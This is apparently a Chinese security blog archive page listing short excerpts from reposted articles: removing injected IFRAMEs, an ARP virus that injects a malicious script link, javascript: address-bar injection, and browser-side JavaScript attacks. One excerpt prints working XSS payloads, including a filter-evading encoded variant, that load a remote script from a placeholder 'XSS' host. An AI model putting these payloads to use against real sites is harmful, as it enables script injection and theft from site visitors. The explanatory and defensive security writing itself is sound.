鬼仔注:后续 http://huaidan.org/archives/1567.html
作者:灵儿
来源:cncert
最近公司和好朋友的网站纷纷被IFRAME了,有的挂上了鸽子,有的疯狂地弹窗,有的给人家增加流量。一个个文件去查找替换那些IFRAME代码,刚松口气,不久又加上去了,哎,什么世道!于是他们向我这个"JS高手"(他们强加给我的)求救,我也不能等闲视之,只好击键杀杀杀了。
因为FF(Firefox)不怕IFRAME,于是就拿IE开刀,不知道比尔有没有奖发。我只写了一句代码,就搞定了,哈,痛快。就是IE only(特有的)的CSS中的属性expression,插进去试试,果然那些IFRAME不起作用了。
代码如下:
阅读全文 »
请大家转载的时候注明引用出处(http://blog.csdn.net/michael_veking)以及作者信息(veking),谢谢!
本文的目的是探讨JS相关技术,并不是以杀毒为主要目的,杀毒只是为讲解一些JS做铺垫的,呵呵,文章有点长,倒杯咖啡或者清茶慢慢看,学习切勿急躁!
最近公司的网络中了这两天闹的很欢的ARP病毒,导致大家都无法上网,给工作带来了很大的不方便,在这里写下杀毒的过程,希望对大家能有帮助!
现象:打开部分网页显示为乱码,好像是随机的行为,但是看似又不是,因为它一直在监视msn.com,呵呵,可能和微软有仇吧,继续查看源代码,发现头部有一个js文件链接—-<script src=http://9-6.in/n.js></script>;
Tags: ARP, JavaScript来源:黯魂的网络日志
//作者: kostis90gr
//翻译: 黯魂[S.S.T]
//本文已发表于《黑客防线》6月刊,版权属于黯魂和《黑客防线》杂志社,转载请务必保持文章完整性,谢谢:)
这份指南仅仅是出于报告目的,如果任何人把它用于违法目的,我不负责任.
通过使用javascript注入,用户不用关闭网站或者把页面保存在他的PC上就可以改变网站中的内容.这是由他的浏览器的地址栏完成的.
命令的语法看上去像这样: javascrit:alert(#command#)
比方说如果你想看到在网站http://www.example.com 里面的一个警告框,那么首先在地址栏输入URL(www.example.com),当页面加载完之后,清空URL并输入javascrit:alert 阅读全文 »
来源:梦之光芒
AJAX让javascript再次大行其道,但JavaScript 真的很不安全。
基于JavaScript的浏览器攻击层出不穷, news.com.com上报道的新的漏洞 。
客户端的js脚本能够在客户端扫描你的机器和内网。然后用Ajax技术将结果发回服务器端。而你所做的只是在浏览网页,你根本不知道后台的javascript在做写什么。
阅读全文 »
信息来源:s0n9'5 B1o9
<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img>
字符过滤怎么办?用Encode加密后就无敌了~
未加密前:<img src='#' XSS="try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}" onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" >
阅读全文 »
信息来源:GSeeker
大图:http://huaidan.org/wp-content/uploads/img/yupoo/20061008/141052_1122768861_jdpnbeud.jpg
上面是我blog的留言簿页,但上面的图片都绕成圈在旋转了。这并不需要什么复杂的方法,只需要直接在浏览器的地址栏里输入一段简单的JavaScript代码即可实现。光是说可能表达不出来效果,下面是由网友制作的视频,是Google图片搜索关于"blog"的结果页,输入那段JavaScript代码后的效果(via Digg):
阅读全文 »
